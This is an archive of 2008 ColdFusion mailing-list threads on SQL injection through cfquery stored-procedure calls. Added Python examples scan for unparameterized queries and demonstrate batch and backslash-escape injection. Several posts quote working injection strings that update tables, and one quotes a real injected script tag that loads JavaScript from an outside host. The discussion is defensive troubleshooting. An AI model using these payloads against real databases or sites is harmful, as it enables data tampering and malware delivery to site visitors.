Go ahead... see what you get.  10/15/2116

Now go figure THAT one out!

Dave Phillips





Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309490


RE: cfquery and cfstoredproc

2008-07-22 Thread Dave Watts
  i have been asked to look at a possible sql injection attack. 
   as I look through the code I see stored procs being called 
  by using cfquery like:
 
  <cfquery name="asdf" datasource="asdf">
 
    storedproc '#var1#', '#var2#'
 
  </cfquery>
  
  I've read about using cfstored procs and params to prevent attacks.
  I've read that using cfquery and doing inline queries can 
  cause injection attacks but I wasn't sure about using cfquery 
  and calling a stored proc through it. Can somebody please confirm?  

 Yes you are vulnerable if you do not sanitize the inputs.

Actually, generally you won't be vulnerable here. You're calling a stored
procedure, which is going to take your inputs and stick them in input
parameters. As long as you're not executing strings directly in your stored
procedure (using EXEC, EXECUTE, sp_executesql, etc) you'll be fine.

Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/

Fig Leaf Software provides the highest caliber vendor-authorized
instruction at our training centers in Washington DC, Atlanta,
Chicago, Baltimore, Northern Virginia, or on-site at your location.
Visit http://training.figleaf.com/ for more information!

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309491


RE: cfquery and cfstoredproc

2008-07-22 Thread Mark Kruger
Dave,

What about a semi-colon?

Storedproc '#var1#','#var2#' ;  *other code* 

Would the CFQUERY not allow this additional code to run?

-Mark



Mark A. Kruger, CFG, MCSE
(402) 408-3733 ext 105
www.cfwebtools.com
www.coldfusionmuse.com
www.necfug.com




Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309492


RE: cfquery and cfstoredproc

2008-07-22 Thread Dave Watts
 What about a semi-colon?
 
 Storedproc '#var1#','#var2#' ;  *other code* 
 
 Would the CFQUERY not allow this additional code to run?

It wouldn't allow any of the values after the stored procedure call
storedproc to run as code, because they would be placed in the input
parameters of the stored procedure. Essentially, this has the same effect as
parameterizing your query in CF.

Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/

Fig Leaf Software provides the highest caliber vendor-authorized
instruction at our training centers in Washington DC, Atlanta,
Chicago, Baltimore, Northern Virginia, or on-site at your location.
Visit http://training.figleaf.com/ for more information!

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309493


RE: cfquery and cfstoredproc

2008-07-22 Thread Tim Do
So I'm hearing that it should be fine??  

Somehow their database column values were appended with the following string:
</title><script src=http://1.verynx.cn/w.js></script><!--

So for example the column firstname value John became:
John</title><script src=http://1.verynx.cn/w.js></script><!--

What else could have caused this?  Like you said the parameters are in
single quotes and the data type is varchar so it must have a single
quote in order to work.  I'm confused...






Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309494


RE: cfquery and cfstoredproc

2008-07-22 Thread Dave Watts
 So I'm hearing that it should be fine??  
 
 Somehow their database column values were appended with the
 following string:
 </title><script src=http://1.verynx.cn/w.js></script><!--
 
 So for example the column firstname value John became:
 John</title><script src=http://1.verynx.cn/w.js></script><!--
 
 What else could have caused this?  Like you said the 
 parameters are in single quotes and the data type is varchar 
 so it must have a single quote in order to work.  I'm confused...

The specific attack in question looks for numeric inputs, not character
inputs. So, my guess is that you have some other unparameterized query that
is being called by the attack.

I recommend you examine your codebase to find unparameterized queries. I
found this tool, mentioned here by others, to be very helpful for this:
http://qpscanner.riaforge.org/

Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/

Fig Leaf Software provides the highest caliber vendor-authorized
instruction at our training centers in Washington DC, Atlanta,
Chicago, Baltimore, Northern Virginia, or on-site at your location.
Visit http://training.figleaf.com/ for more information!
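A small static check of the kind Dave recommends above, added here as an example; it is neither qpscanner's code nor anything posted in the thread. It walks every cfquery body in a CFML file and reports each #...# interpolation that is not the value of a cfqueryparam tag, which catches both the `storedproc '#var1#', '#var2#'` shape from Tim's question and the `ORDER BY #variable#` case from Brad's link. The CFML sample inside the script is constructed for the example.

```python
"""Find #variable# interpolations that reach the SQL text of a <cfquery> directly.

Added example; it is not qpscanner and not code from the thread. It treats
any #...# inside a <cfquery> body as unparameterized unless it sits inside a
<cfqueryparam ...> tag (where it is bound as data, not pasted into the SQL).
"""
import re
import sys
from pathlib import Path
from typing import Dict, Iterable, List, Tuple

# <cfquery ...> ... </cfquery>; the \b keeps <cfqueryparam> from matching as <cfquery>
CFQUERY_RE = re.compile(r"<cfquery\b[^>]*>(.*?)</cfquery>", re.IGNORECASE | re.DOTALL)
# a complete <cfqueryparam ...> tag, attributes included
CFQUERYPARAM_RE = re.compile(r"<cfqueryparam\b[^>]*>", re.IGNORECASE | re.DOTALL)
# one #expression# interpolation on a single line
INTERP_RE = re.compile(r"#([^#\n]+)#")

Finding = Tuple[int, str]  # (1-based line number, interpolated expression)


def find_unparameterized(cfml: str) -> List[Finding]:
    """Return every #expr# that lands in SQL text rather than in a cfqueryparam value."""
    findings: List[Finding] = []
    for query in CFQUERY_RE.finditer(cfml):
        body = query.group(1)
        body_offset = query.start(1)
        # Blank out each <cfqueryparam> tag with spaces of the same length so that
        # offsets (and therefore line numbers) still map onto the original text.
        masked = CFQUERYPARAM_RE.sub(lambda m: " " * len(m.group(0)), body)
        for m in INTERP_RE.finditer(masked):
            line = cfml.count("\n", 0, body_offset + m.start()) + 1
            findings.append((line, m.group(1).strip()))
    return findings


def scan_files(paths: Iterable[str]) -> Dict[str, List[Finding]]:
    """Scan .cfm/.cfc files and return {path: findings} for the files that have any."""
    report: Dict[str, List[Finding]] = {}
    for p in paths:
        found = find_unparameterized(Path(p).read_text(encoding="utf-8", errors="replace"))
        if found:
            report[str(p)] = found
    return report


# Constructed sample: one safe query, then a stored-procedure call and an
# ORDER BY that splice CF variables straight into the SQL string.
SAMPLE_CFML = """\
<cfquery name="safe" datasource="yourDS">
    SELECT * FROM myTable
    WHERE myColumn = <cfqueryparam cfsqltype="CF_SQL_INTEGER" value="#someVar#">
</cfquery>
<cfquery name="proc" datasource="yourDS">
    storedproc '#var1#', '#var2#'
</cfquery>
<cfquery name="sorted" datasource="yourDS">
    SELECT id FROM myTable ORDER BY #url.sortcol#
</cfquery>
"""

if __name__ == "__main__":
    targets = sys.argv[1:]
    if targets:
        for path, found in scan_files(targets).items():
            for line, expr in found:
                print(f"{path}:{line}: unparameterized #{expr}#")
    else:
        for line, expr in find_unparameterized(SAMPLE_CFML):
            print(f"sample:{line}: unparameterized #{expr}#")
```

The check is deliberately textual: it also flags variables used for column names or in ORDER BY, which is intended, because cfqueryparam cannot bind those and they need an allow-list of permitted values instead. Run it with no arguments to see the three findings from the sample, or pass file paths to scan a codebase.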

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309495


RE: writing protected CF with CFStoredProc

2008-07-22 Thread Dave Watts
 The discussion yesterday regarding using CFqueryparam to 
 protect sites from SQL Injection attacks got me thinking.  
 Well, it is easy enough to use CFQUERYPARAM everywhere inside 
 CFQUERY tags, wherever a variable is passed to the SQL query.
 
 However, how do you do that with CFStoredProc?
 
 If I understand correctly, if you want to protect calls to 
 stored procs (from SQL injection and the like), you have to 
 use cfstoredproc and cfprocparam instead of cfquery and 
 cfqueryparam.  But apparently, you can't indicate what 
 parameters you're actually passing.  Am I missing something?
 
 Say you had a proc that looked like this:
 
 CREATE PROC sps_testproc
 @AID int = null,
 @BID int = null
 as
 IF @AID is not null
 SELECT @AID
 IF @BID is not NULL
 SELECT @BID
 
 If I was using CFQUERY, unprotected-style, I might write this:
 
 <cfquery ...>
 sps_testproc
 <cfif whichvar EQ "A">
 @aid=123
 <cfelse>
 @bid=456
 </cfif>
 </cfquery>

Well, first of all, in this case the stored procedure itself is handling
validation. It's going to make sure that @aid and @bid are integers, and
fail if they're not. In addition, in the above case, the parameters don't
even contain CF variables! So, you don't really need to go any farther, as
your current code is safe.

 If I was using CFSTOREDPROC, I might write this:
 
 <cfstoredproc procedure="sps_testproc" ...>
 <cfprocparam type="in" cfsqltype="cf_sql_integer" value="123">
 </cfstoredproc>
 
 See my problem?  In my proc example, we don't need to know 
 which of the two params is going to be passed to it.  In the 
 CFQUERY, I use that to pass one param or the other depending 
 on something else (the value of whichvar).
 But as far as I can tell, CFSTOREDPROC doesn't let me tell it 
 which parameter I'm passing -- presumably it wants all 
 parameters, in order.  So maybe I need something like this:
 
 <cfstoredproc procedure="sps_testproc" ...>
 <cfif whichvar EQ "A">
 <cfprocparam type="in" cfsqltype="cf_sql_integer" value="123">
 <cfprocparam type="in" cfsqltype="cf_sql_integer" null="yes">
 <cfelse>
 <cfprocparam type="in" cfsqltype="cf_sql_integer" null="yes">
 <cfprocparam type="in" cfsqltype="cf_sql_integer" value="456">
 </cfif>
 </cfstoredproc>
 
 That kind of sucks, right?  Am I making any sense?

CF 5 and earlier used the DBVARNAME attribute to specify which one is which.
My understanding is that JDBC doesn't support this, so CF no longer supports
this either. However, I'm not knowledgeable enough about JDBC to confirm
this, so maybe it's a DataDirect-specific issue. In any case, you need to
send parameters in the order that they're expected by the stored procedure.

That said, you can send NULLs to each parameter that allows it, and you
could simplify the above code:

<cfstoredproc procedure="sps_testproc" datasource="yourDS">
    <cfprocparam type="in" cfsqltype="cf_sql_integer" value="123"
        null="#YesNoFormat(whichvar NEQ 'A')#">
    <cfprocparam type="in" cfsqltype="cf_sql_integer" value="456"
        null="#YesNoFormat(whichvar EQ 'A')#">
</cfstoredproc>

Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/

Fig Leaf Software provides the highest caliber vendor-authorized
instruction at our training centers in Washington DC, Atlanta,
Chicago, Baltimore, Northern Virginia, or on-site at your location.
Visit http://training.figleaf.com/ for more information!

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309496


RE: cfquery and cfstoredproc

2008-07-22 Thread Mark Kruger
Dave,

I never disagree with you (usually a fool's errand), but I want a
clarification. I think you might mean that this particular use is safe
because CF will escape the single quotes. But the code below is vulnerable
in exactly the same way as a CFQUERY.

As a test I created an SP

-
CREATE PROCEDURE dbo.sp_test
    @iObject varchar(200)
AS

    SET NOCOUNT ON

    SELECT @iObject AS item


Then I ran the following code:

---

<cfquery name="test" datasource="test">

    sp_test 'bob'; update coaches set name = 'Dave Watts' where coach_id = 1

</cfquery>
--
Both of these statements run and the coaches table was updated. 


So, yes, it's protected in this case (because of escaping), but if the values
were unsanitized integers it would be just as exposed as a regular query,
right? If it looked like this:


<cfquery name="test" datasource="test">

    sp_test #bob_id#

</cfquery>

I would be able to attack it I think. Probably not as easy to get the syntax
right but... Still possible.

Mark A. Kruger, CFG, MCSE
(402) 408-3733 ext 105
www.cfwebtools.com
www.coldfusionmuse.com
www.necfug.com

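Mark's experiment in portable form, added here as an example that is not code from the thread. SQLite has no stored procedures, so sp_test's `select @iObject AS item` is emulated by a one-column SELECT, and Python's sqlite3 executescript() stands in for a SQL Server batch, which runs every statement in the string. The table, its row and the payload are constructed for the example. The same value is sent three ways: pasted into the SQL as `sp_test #bob_id#` does, bound as a parameter as cfqueryparam or cfprocparam do, and checked as an integer the way cfsqltype="cf_sql_integer" would.

```python
"""Why `sp_test #bob_id#` inside <cfquery> is injectable and a bound parameter is not.

Added example, not the thread's code. SQLite stands in for SQL Server:
sp_test's `select @iObject AS item` becomes a plain one-column SELECT, and
executescript() plays the role of a T-SQL batch that runs every statement.
"""
import sqlite3
from typing import Tuple

# Constructed payload in the shape of Mark's test: a value that closes the
# intended statement and appends a second one (the trailing -- swallows the
# rest of the original statement).
PAYLOAD = "1; update coaches set name = 'Dave Watts' where coach_id = 1 --"


def fresh_db() -> sqlite3.Connection:
    """In-memory database holding the one row Mark's UPDATE targets."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE coaches (coach_id INTEGER PRIMARY KEY, name TEXT)")
    conn.execute("INSERT INTO coaches VALUES (1, 'Original Coach')")
    conn.commit()
    return conn


def coach_name(conn: sqlite3.Connection) -> str:
    """Current name of coach 1, used to see whether the injected UPDATE ran."""
    return conn.execute("SELECT name FROM coaches WHERE coach_id = 1").fetchone()[0]


def call_concatenated(conn: sqlite3.Connection, bob_id: str) -> str:
    """<cfquery>sp_test #bob_id#</cfquery>: the raw text becomes part of the batch."""
    batch = f"SELECT {bob_id} AS item;"
    conn.executescript(batch)  # every statement in the string runs, as a T-SQL batch would
    return coach_name(conn)


def call_parameterized(conn: sqlite3.Connection, bob_id: str) -> Tuple[str, str]:
    """<cfqueryparam>/<cfprocparam>: the value travels as bound data, never as SQL."""
    item = conn.execute("SELECT ? AS item", (bob_id,)).fetchone()[0]
    return item, coach_name(conn)


def call_type_checked(conn: sqlite3.Connection, bob_id: str) -> int:
    """What cfsqltype="cf_sql_integer" enforces even before binding: an integer or an error."""
    n = int(bob_id)  # ValueError for anything that is not a plain integer
    return conn.execute(f"SELECT {n} AS item").fetchone()[0]


def payload_rejected_by_type_check() -> bool:
    """True when the integer check refuses the payload outright."""
    try:
        call_type_checked(fresh_db(), PAYLOAD)
    except ValueError:
        return True
    return False


def demo() -> Tuple[str, str, str]:
    """(name after the concatenated call, item the bound call returns, name after the bound call)."""
    after_concat = call_concatenated(fresh_db(), PAYLOAD)
    item, after_bound = call_parameterized(fresh_db(), PAYLOAD)
    return after_concat, item, after_bound


if __name__ == "__main__":
    print(demo())
    print("integer check rejects payload:", payload_rejected_by_type_check())
```

The concatenated call ends with the coaches row renamed, exactly as in Mark's test; the bound call returns the whole payload as the `item` column and leaves the table alone, because a parameter is data to the engine rather than text it parses. The integer check is the other half of what cf_sql_integer buys: the payload never reaches the database at all.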



Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309497


Re: ('1,1') * 1 = 39448

2008-07-22 Thread Bert Dawson
I should have spotted that: I noticed that the differences between 0,1 and
0,2 and 0,3 were 31, 29 and 31, etc. And also that the sequences jumped when
the numbers went from 12 to 13, and likewise around 30. And also leaps of
365 and 366 between 1,32 and 1,33 and 1,34 etc.

So CF is saying, well, 1,1 isn't a number, but might be a date, then getting
the number of days from 1 jan 1900 (or 30 dec 1988) to 1st Jan 2008 and using
that in the calculation.

Well, at least there is an explanation, but personally I can't see the point
in a feature which interprets 1,1 and 12,13 and 13,12 and 12,53 etc. as
dates, and any code which actively relied on such an abomination (as
opposed to falling victim to this feature) should be taken out and shot.

But looking on the bright side, we shouldn't have any more customers getting
charged $1,143,992 for something they were expecting to pay $29 for...

Cheers
Bert



On Tue, Jul 22, 2008 at 5:43 PM, Experienced CF Developer 
[EMAIL PROTECTED] wrote:

 Looked like it could be a ColdFusion date value to me.  So I did a
 dateFormat() on that and came up with 01/01/2008:

 <cfset nValue = "1,1" * 1>
 <cfoutput>#dateFormat(nValue, "mm/dd/yyyy")#<br><br></cfoutput>

 It's assuming 1,1 is the current month and year.  I did the same for
 5,23 * 1 and got 05/23/2008.

 What's really fun is if you do 1,1 * 2..

 Go ahead... see what you get.  10/15/2116

 Now go figure THAT one out!

 Dave Phillips

 -Original Message-
 From: Bert Dawson [mailto:[EMAIL PROTECTED]
 Sent: Tuesday, July 22, 2008 5:08 PM
 To: CF-Talk
 Subject: ('1,1') * 1 = 39448

 I tracked down a defect to a piece of code which basically did the
 following:

 total = form.quantity * form.itemamount

 In some cases, form.quantity is coming through as *1,1* which is
 presumably due to an HTML issue with duplicate form fields with the same name.

 But rather than getting a CF error cos 1,1 isn't a number, it evaluates to
 39448!

 i.e.
    <cfoutput>'1,1' * 1 = #'1,1' * 1#</cfoutput>
 produces:
   '1,1' * 1 = 39448

 I'm not worried about the original problem with the form.quantity coming
 through as *1,1* rather than the expected *1* since I can fix that, but I'm
 curious as to any reason for this odd result.

 It looks like (x,y) * 1 is the same as (y,x) * 1
 In other words
    <cfoutput>#'5,23' * 1# = #'23,5' * 1# = 39591</cfoutput>

 As I say, I'm not worried about fixing the defect, but I'm just curious if
 there is an underlying explanation for the apparently weird behaviour. Or is
 it just a bug in the way CF does the conversion?

 Cheers
 Bert

 p.s. FWIW here's a snippet which will create a 101 square grid of all the
 combinations:

 <cfoutput>
 <table border="1">
 <cfloop from="0" to="100" index="i">
     <tr>
     <cfloop from="0" to="100" index="j">
         <td nowrap="true">#wtf(i,j)#</td>
     </cfloop>
     </tr>
 </cfloop>
 </table>
 </cfoutput>

 <cfscript>
 function wtf(a,b) {
     var x = '#a#,#b#';
     try {
         return '#x#*1 = ' & x*1;
     }
     catch(Any E) {
         return '#x#*1 pukes';
     }
 }
 </cfscript>
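An added example, not from the thread, that models the coercion Bert reasons out above in Python: a comma pair is tried as month,day and then day,month in a given year and turned into CF's day serial, beside the strict check a quantity field should get. It assumes CF's serial epoch is 30 Dec 1899 (day 0) and takes the year as an explicit argument rather than reading the clock; the function names are constructed for illustration.

```python
from datetime import date

# Assumption (see lead-in): CF's date serial counts days from 30 Dec 1899,
# so 1 Jan 2008 is day 39448, the number in the thread's subject line.
CF_EPOCH = date(1899, 12, 30)

def cf_date_serial(d: date) -> int:
    """Days from the CF epoch to d: the number a date becomes in arithmetic."""
    return (d - CF_EPOCH).days

def coerce_comma_pair(value: str, year: int) -> int:
    """Model of CF turning a non-numeric 'a,b' string into a number: try it as
    month,day and then day,month in the given year and return the serial of
    whichever is a valid date. The year is explicit so results are stable
    (CF uses the current year)."""
    a, b = (int(p) for p in value.split(","))
    for month, day in ((a, b), (b, a)):
        try:
            return cf_date_serial(date(year, month, day))
        except ValueError:
            continue
    raise ValueError(f"{value!r} is neither a number nor a valid date pair")

def loose_total(quantity: str, item_amount: float, year: int) -> float:
    """The defect as posted: quantity * itemamount with CF-style coercion, so
    a duplicated form field arriving as '1,1' silently becomes a date serial."""
    try:
        q = float(quantity)
    except ValueError:
        q = coerce_comma_pair(quantity, year)
    return q * item_amount

def strict_quantity(quantity: str) -> int:
    """The check the form handler needs: accept only a plain integer, so a
    list value such as '1,1' is rejected instead of coerced."""
    s = quantity.strip()
    if not s.isdigit():
        raise ValueError(f"invalid quantity: {quantity!r}")
    return int(s)

def safe_total(quantity: str, item_amount: float) -> float:
    """Same calculation with the strict check in front of it."""
    return strict_quantity(quantity) * item_amount
```

With the year fixed at 2008, `loose_total("1,1", 29, 2008)` reproduces the $1,143,992 charge mentioned above, while `safe_total("1,1", 29)` raises.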




 


Archive: 
http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309498


RE: cfquery and cfstoredproc

2008-07-22 Thread Dave Watts
 I never disagree with you (usually a fool's errand)

Ha! I wish.

 but I want a clarification. I think you might mean that this 
 particular use is safe because CF will escape the single quotes. 
 But the code below is vulnerable in exactly the same way as a CFQUERY.
 
 As a test I created an SP
 
 -
 CREATE PROCEDURE dbo.sp_test
 @iObject varchar(200)
 as
 
 set nocount on
 
 select @iObject AS item
 
 
 Then I ran the following code:
 
 ---
 
 <cfquery name="test" datasource="test">
 
 sp_test 'bob'; update coaches set name = 'Dave Watts' where 
 coach_id = 1
 
 </cfquery>
 --
 Both of these statements run and the coaches table was updated.

Yeah, you're right about that. If you have a numeric value in your CFQUERY,
it could be broken to also contain a string. The semicolon would turn the
single original stored procedure call into an SQL batch containing the
stored procedure and whatever your string contained.

Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/

Fig Leaf Software provides the highest caliber vendor-authorized
instruction at our training centers in Washington DC, Atlanta,
Chicago, Baltimore, Northern Virginia, or on-site at your location.
Visit http://training.figleaf.com/ for more information!


Archive: 
http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309499


RE: writing protected CF with CFStoredProc

2008-07-22 Thread Dave Watts
  Say you had a proc that looked like this:
  
  CREATE PROC sps_testproc
  @AID int = null,
  @BID int = null
  as
  IF @AID is not null
  SELECT @AID
  IF @BID is not NULL
  SELECT @BID
  
  If I was using CFQUERY, unprotected-style, I might write this:
  
  <cfquery ...>
  sps_testproc
  <cfif whichvar EQ "A">
  @aid=123
  <cfelse>
  @bid=456
  </cfif>
  </cfquery>
 
 Well, first of all, in this case the stored procedure itself 
 is handling validation. It's going to make sure that @aid and 
 @bid are integers, and fail if they're not. In addition, in 
 the above case, the parameters don't even contain CF 
 variables! So, you don't really need to go any farther, as 
 your current code is safe.

As Mark just pointed out, if you did have actual CF variables in your
statement, those would be vulnerable. The stored procedure itself isn't
vulnerable, of course, but the CFQUERY tag would be unless you'd configured
your database login so that it could only execute stored procedures.

Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/

Fig Leaf Software provides the highest caliber vendor-authorized
instruction at our training centers in Washington DC, Atlanta,
Chicago, Baltimore, Northern Virginia, or on-site at your location.
Visit http://training.figleaf.com/ for more information!


Archive: 
http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309500


RE: cfquery and cfstoredproc

2008-07-22 Thread Dave Watts
  So I'm hearing that it should be fine??  
  
  Somehow their database columns values were appended the following 
  string
  : /titleInvalidTag src=http://1.verynx.cn/w.js;/script!--
  
  So for example the column firstname value was John became:
  John/titleInvalidTag src=http://1.verynx.cn/w.js;/script!--
  
  What else could have caused this?  Like you said the parameters are in 
  single quotes and the data type is varchar so it must have a single 
  quote in order to work.  I'm confused...
 
 The specific attack in question looks for numeric inputs, not 
 character inputs. So, my guess is that you have some other 
 unparameterized query that is being called by the attack.
 
 I recommend you examine your codebase to find unparameterized 
 queries. I found this tool, mentioned here by others, to be 
 very helpful for this:
 http://qpscanner.riaforge.org/

As Mark pointed out, if you did have numeric inputs in your CFQUERY tag,
those would still be vulnerable. If not, though, the rest of my statement
still stands.

Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/

Fig Leaf Software provides the highest caliber vendor-authorized
instruction at our training centers in Washington DC, Atlanta,
Chicago, Baltimore, Northern Virginia, or on-site at your location.
Visit http://training.figleaf.com/ for more information!


Archive: 
http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309501


RE: cfquery and cfstoredproc

2008-07-22 Thread Mark Kruger
Dave,

Do you mind if I blog about that part where you said "Yeah, you're right about
that"?   That's got to be good for my cf_streetCred (ha). 

-mk

-Original Message-
From: Dave Watts [mailto:[EMAIL PROTECTED] 
Sent: Tuesday, July 22, 2008 7:14 PM
To: CF-Talk
Subject: RE: cfquery and cfstoredproc

 I never disagree with you (usually a fool's errand)

Ha! I wish.

 but I want a clarification. I think you might mean that this 
 particular use is safe because CF will escape the single quotes.
 But the code below is vulnerable in exactly the same way as a CFQUERY.
 
 As a test I created an SP
 
 -
 CREATE PROCEDURE dbo.sp_test
 @iObject varchar(200)
 as
 
 set nocount on
 
 select @iObject AS item
 
 
 Then I ran the following code:
 
 ---
 
 <cfquery name="test" datasource="test">
 
 sp_test 'bob'; update coaches set name = 'Dave Watts' where coach_id = 
 1
 
 </cfquery>
 --
 Both of these statements run and the coaches table was updated.

Yeah, you're right about that. If you have a numeric value in your CFQUERY,
it could be broken to also contain a string. The semicolon would turn the
single original stored procedure call into an SQL batch containing the
stored procedure and whatever your string contained.

Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/

Fig Leaf Software provides the highest caliber vendor-authorized instruction
at our training centers in Washington DC, Atlanta, Chicago, Baltimore,
Northern Virginia, or on-site at your location.
Visit http://training.figleaf.com/ for more information!




Archive: 
http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309502


Re: do not increase counter is returns 0

2008-07-22 Thread Gerald Guido
Given the nature of this thread, ad hominid attacks is one of the best
Freudian/spell check slip(s) in hominid history.

~G~

On Tue, Jul 22, 2008 at 10:11 AM, Adrian Lynch [EMAIL PROTECTED]
wrote:

 Hominid: Any member of the biological family Hominidae (the great apes),
 including the extinct and extant humans, chimpanzees, gorillas, and
 orangutans.

 Thank you.

 Adrian :OD

 -Original Message-
 From: Brian Kotek [mailto:[EMAIL PROTECTED]
 Sent: 03 June 2008 21:08
 To: CF-Talk
 Subject: Re: do not increase counter is returns 0


 Thank you, Charlie.

 Yes, as you point out, I have tried over and over to explain things to Erik
 as well as reiterate that what he asks about are things that would be
 explained in the first few chapters of any book (or even website tutorial)
 on the subject. Instead, he absolutely refuses to try to learn himself and
 instead keeps on asking questions. Why? Because people keep answering them.
 I'm trying to help him AND the list because the current situation is
 harming
 both. But to be honest, the fact that Mr. Roberts misses the point
 completely and resorts to the very ad hominid attacks he condemns is not
 shocking in the slightest.


 


Archive: 
http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309503


Re: (ot) URL Hack Attempt Leaves Me Scractching My Head...

2008-07-22 Thread Jesse Beckton
Doooh!

I just got through cleaning the results of this attack out of a client's 
database! They have a very old CF application that was poorly written and has 
no cfqueryparams!
 
I must have cleaned 10 tables so far... Funny part is, I warned my client 
several months ago after seeing evidence of a SQL injection in his DB that he 
needed to at the very least purchase an application firewall to protect his 
sites. After running a trial of a popular application firewall he decided not 
to spend the money or try to deal with the ongoing tweaking required so that 
his site visitors are not affected by the firewall. Needless to say his 
security holes just cost him a lot more money and down time due to this latest 
attack. 


Archive: 
http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309504


Re: cfquery and cfstoredproc

2008-07-22 Thread Brad Wood
I'll admit it.  The first time Dave conceded I was right about something, it 
got printed out and stuck on my cubicle wall.
Hey, I gotta' celebrate *something*  :)

~Brad

- Original Message - 
From: Mark Kruger [EMAIL PROTECTED]
To: CF-Talk cf-talk@houseoffusion.com
Sent: Tuesday, July 22, 2008 8:58 PM
Subject: RE: cfquery and cfstoredproc


 Dave,

 Do you mind if I blog about that part where you said "Yeah, you're right 
 about
 that"?   That's got to be good for my cf_streetCred (ha).

 -mk
 


Archive: 
http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309505


Re: cfquery and cfstoredproc

2008-07-22 Thread Brad Wood
 As Mark pointed out, if you did have numeric inputs in your CFQUERY tag,
 those would still be vulnerable. If not, though, the rest of my statement
 still stands.

 Dave Watts, CTO, Fig Leaf Software
 http://www.figleaf.com/


Actually, I'm gonna pick on you again Dave and challenge this. (I'm hoping 
to add to my wall)

If someone is using MySQL, they have allowMultiQueries set to true and 
have not changed the NO_BACKSLASH_ESCAPES from its default setting, the 
example given would still be vulnerable to SQL injection.  I set up an 
example locally just to make sure.

I created this MySQL proc:
CREATE PROCEDURE sp_test(input varchar(100))
BEGIN
select input;
END

Then call it with the following CFML (The contents of the var variable could 
easily come from URL or FORM):

<cfset var = "Hello World\'); update links set active = yes; -- ">

<cfquery name="test" datasource="foo">
    call sp_test('#var#');
</cfquery>

You will notice that the input to the proc was enclosed in single ticks, 
however SQL injection was still successful since MySQL allows for single 
ticks to be escaped with a backslash and CF doesn't prevent that.  (That 
code updated all the records in my links table)

The OP didn't specify, but IF he is on another DBMS like MS SQL he would be 
OK.  However, I know MySQL is pretty common, and a lot of people run it in 
allowMultiQueries mode.

~Brad 
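An added example in Python, not from the thread or from ColdFusion itself, that models both tests posted above: Mark's semicolon in an unquoted (numeric) position and Brad's backslash-escaped quote inside a quoted one. It assumes CF's escaping is exactly quote doubling; the escaping helper, the batch splitter and the two sample inputs are constructed for illustration, and the parameterized call stands in for cfqueryparam/cfprocparam.

```python
def cf_quote_escape(value: str) -> str:
    """Model of what CF does to a string dropped into CFQUERY text: single
    quotes are doubled, backslashes are left alone."""
    return value.replace("'", "''")

def literal_end(sql: str, start: int, backslash_escapes: bool) -> int:
    """Index just past the closing quote of the literal opening at sql[start],
    or -1 if unterminated. '' is an escaped quote in every mode; \\' is one
    only when backslash escapes are on (MySQL's default unless
    NO_BACKSLASH_ESCAPES is set)."""
    i = start + 1
    while i < len(sql):
        if sql[i] == "\\" and backslash_escapes:
            i += 2                        # backslash escapes the next char
        elif sql[i] == "'" and sql[i + 1:i + 2] == "'":
            i += 2                        # doubled quote stays in the literal
        elif sql[i] == "'":
            return i + 1                  # literal closed
        else:
            i += 1
    return -1

def split_batch(sql: str, backslash_escapes: bool) -> list[str]:
    """Split SQL text into the statements a server would run, honouring string
    literals and '--' comments. Two or more statements means a semicolon in
    user data turned a single call into a batch."""
    stmts, buf, i = [], [], 0
    while i < len(sql):
        if sql[i] == "'":
            end = literal_end(sql, i, backslash_escapes)
            end = len(sql) if end == -1 else end
            buf.append(sql[i:end]); i = end
        elif sql.startswith("--", i):     # comment runs to end of line
            nl = sql.find("\n", i)
            i = len(sql) if nl == -1 else nl
        elif sql[i] == ";":
            stmts.append("".join(buf).strip()); buf = []; i += 1
        else:
            buf.append(sql[i]); i += 1
    stmts.append("".join(buf).strip())
    return [s for s in stmts if s]

# Constructed sample inputs mirroring the two tests posted in the thread.
MYSQL_INPUT = "Hello World\\'); update links set active = yes; -- "
MSSQL_INPUT = "'bob'; update coaches set name = 'Dave Watts' where coach_id = 1"

def quoted_call(user_input: str, backslash_escapes: bool) -> list[str]:
    """Brad's case: call sp_test('#var#') with the value pasted into the SQL
    text after CF's quote doubling."""
    return split_batch(f"call sp_test('{cf_quote_escape(user_input)}');",
                       backslash_escapes)

def unquoted_call(user_input: str) -> list[str]:
    """Mark's case: a value in an unquoted position gets no escaping at all."""
    return split_batch(f"sp_test {user_input}", backslash_escapes=False)

def parameterized_call(user_input: str) -> tuple[str, list[str]]:
    """The fix: the value is bound separately and never becomes part of the
    statement text, so the statement count stays at one in every mode."""
    return "call sp_test(?);", [user_input]
```

With backslash escapes on, `quoted_call(MYSQL_INPUT, True)` yields two statements even though CF doubled the quote; with NO_BACKSLASH_ESCAPES modelled (`False`) the whole payload stays inside one literal.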



Archive: 
http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309506


Cold Fusion Project in DC

2008-07-22 Thread Alicia Hamilton
We have an immediate need for a Web Applications Developer.  It will be a 3 
month project working on several client projects.  Position will be primarily 
based in the Alexandria, VA office, but that may change to DC Department of 
Transportation at the Navy Yard metro.  Need to be able to go to either.  

$37 is pay maximum rate – let me know if that’s doable.

Requirements: Cold Fusion development/coding, Dreamweaver, MS SQL Server.  Web 
